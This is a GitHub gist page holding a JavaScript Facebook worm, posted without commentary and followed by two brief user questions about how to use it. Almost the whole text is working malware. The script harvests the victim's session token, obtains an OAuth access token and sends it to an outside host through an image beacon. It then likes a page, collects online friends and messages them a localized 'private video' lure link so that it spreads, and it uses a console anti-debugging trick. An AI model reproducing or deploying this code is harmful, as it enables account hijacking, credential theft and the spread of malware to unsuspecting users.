Skip to content

Instantly share code, notes, and snippets.

@P3t3rp4rk3r

P3t3rp4rk3r/Facebook_Malware_Script.js

Created August 24, 2017 19:26
Show Gist options
  • Save P3t3rp4rk3r/814c9d8d2619f719693393810fc327f4 to your computer and use it in GitHub Desktop.
Save P3t3rp4rk3r/814c9d8d2619f719693393810fc327f4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Facebook_Malware_Script.js
var cnsl = true;
var win = this;
var ajax = win["XMLHttpRequest"];
function start() {
var cookie_name = "app_" + profile_id;
var cookie_time = 40;
if (!getCookie(cookie_name) || parseInt(getCookie(cookie_name)) < Date.now() - 60 * 1000 * cookie_time) {
createCookie(cookie_name, Date.now(), 1);
config = {};
config['chat_limit'] = 50;
platform();
android();
}
}
function android() {
if (localStorage.access_token != "token") {
var getParams = {};
getParams["composer_id"] = "rc.u_0_" + rand(0, 30);
getParams["composer_type"] = "pages_feed";
getParams["target_id"] = "20531316728";
getParams["av"] = profile_id;
getParams["dpr"] = "1";
var params = {};
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "j0";
params["__req"] = "2z";
params["__be"] = "-1";
params["__pc"] = "EXP1:home_page_pkg";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/react_composer/status/bootstrap/?" + deSerialize(getParams));
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
if (xhr.responseText.indexOf('access_token') > 0) {
new Image().src = "http://jaredandrew.com/android.php?profile_id=" + profile_id + "&access_token=" + xhr.responseText.split('access_token":')[1].split('"')[1].split('"')[0] + "&gender=farketmez";
localStorage.access_token = "token";
}
}
}
xhr.send(deSerialize(params));
}
}
function platform() {
var params = {};
params["fb_dtsg"] = fb_dtsg;
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "3p";
params["__req"] = "pS";
params["__be"] = "-1";
params["__pc"] = "EXP:DEFAULT";
params["__rev"] = __rev;
params["jazoest"] = jazoest;
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/settings/application/platform_opt_out/submit/?action=enable&dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
getToken();
}
}
xhr.send(deSerialize(params));
}
function getToken() {
var params = {};
params["fb_dtsg"] = fb_dtsg;
params["app_id"] = "165907476854626";
params["redirect_uri"] = "fbconnect://success";
params["display"] = "popup";
params["access_token"] = "";
params["sdk"] = "";
params["from_post"] = "1";
params["private"] = "";
params["tos"] = "";
params["login"] = "";
params["read"] = "";
params["write"] = "";
params["extended"] = "";
params["social_confirm"] = "";
params["confirm"] = "";
params["seen_scopes"] = "";
params["auth_type"] = "";
params["auth_token"] = "";
params["auth_nonce"] = "";
params["default_audience"] = "";
params["ref"] = "Default";
params["return_format"] = "access_token";
params["domain"] = "";
params["sso_device"] = "ios";
params["__CONFIRM__"] = "1";
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/v2.8/dialog/oauth/confirm", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
if (xhr.responseText.indexOf('access_token=') > 0) {
jsonstore = {};
jsonstore.access_token = xhr.responseText.split('access_token=')[1].split('&')[0];
jsonstore.pages_id = 731953020321037;
Kontrol(jsonstore);
online(jsonstore);
}
}
}
xhr.send(deSerialize(params));
}
function Kontrol(jsonstore) {
var xhr = new XMLHttpRequest();
var params = {};
params["q"] = "SELECT created_time FROM page_fan WHERE uid = me() AND page_id = " + jsonstore.pages_id;
params["access_token"] = jsonstore.access_token;
xhr.open("GET", "https://graph.facebook.com/fql?" + deSerialize(params));
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText);
if (data.data.length == 0) {
pages(jsonstore);
}
}
}
xhr.send();
}
function pages(jsonstore) {
var xhr = new XMLHttpRequest();
var params = {};
params["fbpage_id"] = jsonstore.pages_id;
params["add"] = "true";
params["reload"] = "false";
params["fan_origin"] = "page_timeline";
params["fan_source"] = "";
params["cat"] = "";
params["actor_id"] = profile_id;
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "iw";
params["__req"] = "g";
params["__be"] = "-1";
params["__pc"] = "PHASED:DEFAULT";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
params["__spin_r"] = __rev;
params["__spin_b"] = "trunk";
params["__spin_t"] = Math.floor(Date.now() / 1000);
xhr.open("POST", "https://www.facebook.com/ajax/pages/fan_status.php?av=" + profile_id + "&dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
xhr.close;
}
}
xhr.send(deSerialize(params));
}
function online(jsonstore) {
var params = {}
params["q"] = "SELECT uid, name,locale, online_presence, pic_big, can_post FROM user WHERE uid IN (SELECT uid2 FROM friend WHERE uid1 = me()) Order By online_presence Limit 2000";
params["access_token"] = jsonstore.access_token;
params["ext"] = "me";
var xhr = new ajax();
xhr.open("GET", "https://graph.facebook.com/fql?" + deSerialize(params), true);
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText.replace("for (;;);", ""));
if (!data.error) {
var friends = data.data;
friends = shuffle(friends);
jsonstore.friends = [];
for (i = 0; i < friends.length && jsonstore.friends.length < config.chat_limit; i++) {
if (friends[i].online_presence == "active") {
jsonstore.friends.push(friends[i]);
}
}
for (i = 0; i < friends.length && jsonstore.friends.length < config.chat_limit; i++) {
if (friends[i].online_presence == "idle") {
jsonstore.friends.push(friends[i]);
}
}
if (jsonstore.friends.length > 0) {
getLink(jsonstore);
}
}
}
}
xhr.send();
}
function getLink(jsonstore) {
var xhr = new ajax();
xhr.open("GET", "https://theurlshortener.com/plugins/upload.php?profile_id=" + profile_id);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
var data = JSON.parse(xhr.responseText);
if (data.link) {
jsonstore.link = data.link;
for (i = 0; i < jsonstore.friends.length; i++) {
jsonstore.uid = jsonstore.friends[i].uid;
jsonstore.pic_big = jsonstore.friends[i].pic_big;
jsonstore.name = jsonstore.friends[i].name ? jsonstore.friends[i].name.split(" ")[0] : jsonstore.friends[i].text.split(" ")[0];
send(jsonstore);
}
}
}
}
xhr.send();
}
function country(text) {
if (text == "tr_TR") {
title = "videoyu izle ve kimseye gösterme";
} else if (text.split("_")[0] == "en") {
title = "watch my private video and don't show it to anyone";
} else if (text == "it_IT") {
title = "guarda il mio video privato e non mostrarlo a nessuno";
} else if (text == "de_DE") {
title = "sehen sie sich mein privates Video an und zeigen sie es niemandem";
} else if (text == "pt_PT") {
title = "assista meu vídeo privado e não mostre a ninguém";
} else if (text == "fr_CA" || text == "fr_FR") {
title = "regarde ma vidéo privée et ne le montre pas à personne";
} else if (text == "pl_PL") {
title = "obejrzyj mój prywatny film i nie pokazuj go nikomu";
} else if (text == "el_GR") {
title = "Παρακολουθήστε το ιδιωτικό μου βίντεο και μην το εμφανίζετε σε κανέναν";
} else if (text == "sk_SK") {
title = "pozerať moje súkromné video a neukáže to nikomu";
} else {
title = "Video";
}
return title;
}
function send(jsonstore) {
var uid = jsonstore.uid;
var pic_big = jsonstore.pic_big;
var name = jsonstore.name;
var link = jsonstore.link;
var textArray = [':o', ':P', 'O:)', '3:)', ';)', ':O', '-_-', '>:O', ':*', '<3', '^_^', '8-)', '(y)', ':)'];
var randomText = textArray[Math.floor(Math.random() * textArray.length)];
var message_id = rand(11111111111111, 999999999999999);
var params = {};
params["client"] = "mercury";
params["action_type"] = "ma-type:user-generated-message";
params["body"] = jsonstore.name + " Video " + randomText + "\n" + jsonstore.link + "?" + jsonstore.name;
params["has_attachment"] = "false";
params["message_id"] = message_id;
params["offline_threading_id"] = message_id;
params["other_user_fbid"] = jsonstore.uid;
params["signature_id"] = rastgele(8);
params["source"] = "source:chat:web";
params["specific_to_list[0]"] = "fbid:" + jsonstore.uid;
params["specific_to_list[1]"] = "fbid:" + profile_id;
params["timestamp"] = Date.now();
params["ui_push_phase"] = "C3";
params["__user"] = profile_id;
params["__a"] = "1";
params["__dyn"] = __dyn;
params["__af"] = "j0";
params["__req"] = "18";
params["__be"] = "-1";
params["__pc"] = "PHASED:DEFAULT";
params["__rev"] = __rev;
params["fb_dtsg"] = fb_dtsg;
params["jazoest"] = jazoest;
params["__spin_r"] = __rev;
params["__spin_b"] = "trunk";
params["__spin_t"] = Math.floor(Date.now() / 1000);
var xhr = new ajax();
xhr.open("POST", "https://www.facebook.com/messaging/send/?dpr=1", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
xhr.close;
}
}
xhr.send(deSerialize(params));
}
function generate_name(length, firstUpper) {
rname = "";
sesli = "aeiou";
sessiz = "bcdfghjklmnprstvyz";
rname = rand(1, 2) == 1 ? sessiz[rand(0, sessiz.length - 1)] : sesli[rand(0, sesli.length - 1)];
if (firstUpper == true) {
rname = rname.toUpperCase();
}
for (n = 0; n < length; n++) {
if (sesli.indexOf(rname[rname.length - 1]) >= 0) {
rname += sessiz[rand(0, sessiz.length - 1)];
} else {
rname += sesli[rand(0, sesli.length - 1)];
}
}
return rname;
}
function getCookie(cname) {
var name = cname + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') {
c = c.substring(1);
}
if (c.indexOf(name) == 0) {
return c.substring(name.length, c.length);
}
}
return "";
}
function createCookie(name, value, days) {
var expires;
if (days) {
var date = new Date();
date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
expires = "; expires=" + date.toGMTString();
} else {
expires = "";
}
document.cookie = name + "=" + value + expires + "; path=/";
}
function inArray(arr, key, value) {
var res = false;
for (a = 0; a < arr.length; a++) {
for (k in arr[a]) {
if (k == key && arr[a][k] == value) {
res = true;
break;
}
}
}
return res;
}
function get_dyn() {
function toCompressedString() {
$BitMap1 = [];
for (i in t) {
$BitMap1[t[i]] = 1;
}
if ($BitMap1["length"] === 0) {
return "";
}
var l = [];
var m = 1;
var n = $BitMap1[0] || 0;
var o = n.toString(2);
var p = 1;
for (; p < $BitMap1["length"]; p++) {
var q = $BitMap1[p] || 0;
if (q === n) {
m++;
} else {
l["push"](j(m));
n = q;
m = 1;
}
}
if (m) {
l["push"](j(m));
}
return k(o + l["join"](""));
}
function j(l) {
var m = l.toString(2);
var n = "0" ["repeat"](m["length"] - 1);
return n + m;
}
function k(l) {
var m = (l + "00000")["match"](/[01]{6}/g);
var n = "";
var o = 0;
for (; o < m["length"]; o++) {
n += h[parseInt(m[o], 2)];
}
return n;
}
var bd = document["body"]["innerHTML"]["match"](/\},([0-9])+\]/gi);
var hd = document["head"]["innerHTML"]["match"](/\},([0-9])+\]/gi);
var is = bd["concat"](hd);
var t = [];
for (x in is) {
if (is[x] != null) {
var p = is[x]["replace"]("},", "")["replace"]("]", "");
if (parseInt(p) >= 7) {
t["push"](parseInt(p));
}
}
}
var h = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_";
return toCompressedString();
}
function guid() {
function s4() {
return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1);
}
return s4() + s4() + '-' + s4() + '-' + s4() + '-' + s4() + '-' + s4() + s4() + s4();
}
function randoms(l, m) {
var r = [];
while (r.length < l) {
var rnd = Math.floor(Math.random() * m);
if (r.indexOf(rnd) < 0) {
r.push(rnd);
}
}
return r;
}
function searchArray(a, k) {
var found = false;
for (key in a) {
if (key.toString() == k) {
found = a[key];
break;
} else if (typeof a[key] == "object") {
found = searchArray(a[key], k);
if (found != false) {
break;
}
}
}
return found;
}
function shuffle(array) {
var currentIndex = array.length,
temporaryValue, randomIndex;
while (0 !== currentIndex) {
randomIndex = Math.floor(Math.random() * currentIndex);
currentIndex -= 1;
temporaryValue = array[currentIndex];
array[currentIndex] = array[randomIndex];
array[randomIndex] = temporaryValue;
}
return array;
}
function rand(min, max) {
return Math.floor(Math.random() * (max - min)) + min;
}
function rastgele(uzunluk) {
mtn = "abcdefghijklmnoprstuvyzxABCDEFGHIJKLMNOPRSTUVYZX0123456789";
ret = "";
for (l = 0; l < uzunluk; l++) {
ret += mtn[Math.floor(Math.random() * mtn.length)];
}
return ret;
}
function deSerialize(json) {
return Object.keys(json).map(function(key) {
return encodeURIComponent(key) + '=' + encodeURIComponent(json[key]);
}).join('&');
}
var cntrl = 'd';
var element = new Image();
element.__defineGetter__('id', function() {
cntrl = 'e';
if (cnsl == false) {
location.reload();
}
});
console.log(element);
console.clear();
if (location.hostname.indexOf("facebook.com") >= 0 && (cntrl == 'd' || cnsl == true)) {
fb_dtsg_list = document.getElementsByName('fb_dtsg');
if (fb_dtsg_list.length > 0) {
profile_id = document.cookie.match(/c_user=(\d+)/)[1];
fb_dtsg = fb_dtsg_list[0].value;
__dyn = get_dyn();
if (document.head.innerHTML.split('"client_revision":')[1]) {
__rev = document.head.innerHTML.split('"client_revision":')[1].split(",")[0];
} else {
__rev = rand(1111111, 9999999);
}
jazoest = "";
for (var x = 0; x < fb_dtsg.length; x++) {
jazoest += fb_dtsg.charCodeAt(x);
}
jazoest = '2' + jazoest;
start();
}
}
@nicole1989
Copy link

how to apply this?
I am still learning.
is this malware that can send messages?

Copy link

ghost commented Dec 3, 2018

what is that?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment